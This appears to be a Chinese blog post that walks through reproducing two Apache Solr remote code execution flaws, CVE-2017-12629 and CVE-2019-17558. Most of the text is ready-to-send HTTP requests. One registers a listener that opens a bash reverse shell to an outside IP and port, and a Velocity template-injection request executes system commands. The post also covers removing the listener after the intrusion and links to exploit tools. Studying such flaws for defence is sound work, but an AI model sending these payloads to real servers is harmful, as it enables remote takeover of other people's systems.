作者:北路新华 | 来源:互联网 | 2023-05-20 15:48
1Solr简介Solr是一个独立的企业级搜索应用服务器。它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成
1 Solr简介
Solr 是一个独立的企业级搜索应用服务器。它对外提供类似于 Web-service 的 API 接 口。用户可以通过 http 请求,向搜索引擎服务器提交一定格式的 XML 文件,生成索引;也 可以通过 Http Get 操作提出查找请求,并得到 xml/json 格式的返回结果。
2 漏洞复现
2.1 CVE-2017-12629
2.1.1 漏洞原理
Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。
2.1.2 影响版本
Apache Solr <7.1
Apache Lucene <7.1
2.1.3 利用条件
首先core里面要有内容,如图:
2.1.4 复现过程
在Solr中,能够触发命令执行的时间有两种。如图。postCommit和newSearcher
1.首先用postCommit来命令执行。通过solr.RunExecutableListener 创建shell文件执行命令,如想创建多个,必须更换名称。
POST /solr/demo/config HTTP/1.1
Host: 192.168.178.141:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 186
{"add-listener":{"event":"postCommit","name":"newliwsten","class":"solr.RunExecutableListener","exe":"bash","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/111.111.111.111/7778 0>&1"]}}
注:包中demo根据core里面的内容而定。
执行结果如图:
2.查看listener
在configoverlay.json文件中保存着listener,如图:
3.执行更新配置,触发前面监听器执行创建文件的命令
POST /solr/demo/update HTTP/1.1
Host: 192.168.178.141:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Content-Length: 15
[{"id":"test"}]
注:此包中必须包含Content-Type: application/json
执行结果如图:
5.通过newSearcher命令执行。一个数据包即可。
赞未实现,参考https://blog.csdn.net/qq_41918771/article/details/117654179
4. 等渗透结束后删除创建的listener
POST /solr/demo/config HTTP/1.1
Host: 192.168.1.92:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 28
{"delete-listener":"b4e279"}
2.1.5 工具
工具地址:https://github.com/zhzyker/exphub/blob/master/solr/cve-2017-12629_cmd.py
2.2 CVE-2019-17558
2.2.1 漏洞原理
当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改Apache Solr默认集成VelocityResponseWriter插件,在该插件的初始化参数中的params.resource.loader.enabled这个选项是用来控制是否允许参数资源加载器在Solr请求参数中指定模板,默认设置是false。当设置params.resource.loader.enabled为ture时,将允许用户通过设置请求中的参数来指定相关资源加载,这也就意味着攻击者可以通过构造一个具有威胁的攻击请求,在服务器上进行命令执行。
2.2.2 影响版本
Apache Solr 5.x - 8.2.0,存在config API版本
2.2.3 利用条件
应用开启了某个core(可以在Core Admin中查看),实例中应用开启了core
2.2.4 复现过程
1.Apache Solr默认集成VelocityResponseWriter插件,该插件初始化参数中的params.resource.loader.enabled默认值设置为false,但是可以通过POST请求直接修改集合设置,将其设置为true。
POST /solr/demo/config HTTP/1.1
Host: 192.168.178.141:8983
Content-Type: application/json
Content-Length: 259
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
2.直接get请求,执行命令。
GET /solr/mysole/select?wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: 192.168.178.141:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
2.2.5 工具
https://github.com/jas502n/solr_rce
京公网安备 11010802041100号